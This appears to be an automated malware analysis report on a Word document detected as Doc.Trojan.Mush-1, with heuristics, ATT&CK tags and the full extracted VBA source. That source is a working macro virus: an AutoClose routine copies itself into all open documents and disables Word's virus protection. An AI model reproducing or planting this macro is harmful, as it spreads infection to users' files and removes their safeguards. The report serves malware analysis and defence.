MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Mush-1. It contains a VBA macro within the 'macros.bas' file, specifically an AutoClose macro. This macro is designed to copy itself to other open documents, indicating a propagation mechanism. The presence of the AutoClose macro and the ClamAV detection strongly suggest a malicious intent, likely to spread further or deliver a secondary payload.
Heuristics 4
-
ClamAV: Doc.Trojan.Mush-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Mush-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 838 bytes |
SHA-256: 79800a081137ebd69eaad07898715d3be6e3757346a81757e4922c653dfc4123 |
|||
|
Detection
ClamAV:
Doc.Trojan.Mush-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "MushRoom" Sub AutoClose() Attribute AutoClose.VB_Description = "Macro creata il 16/05/99 da Hacker's god" Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.autoclose" On Error Resume Next Dim S, D, i S = ActiveDocument.FullName For i = 1 To Documents.Count D = Documents(i).FullName Application.OrganizerCopy Source:=S, Destination:=D, Name:="MushRoom", Object:=wdOrganizerObjectProjectItems Next i Options.VirusProtection = False If Month(Now) = 10 And Hour(Now) < 7 Then MsgBox "MushRooms!" 'Mushrooms are tasty, aren't they? End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.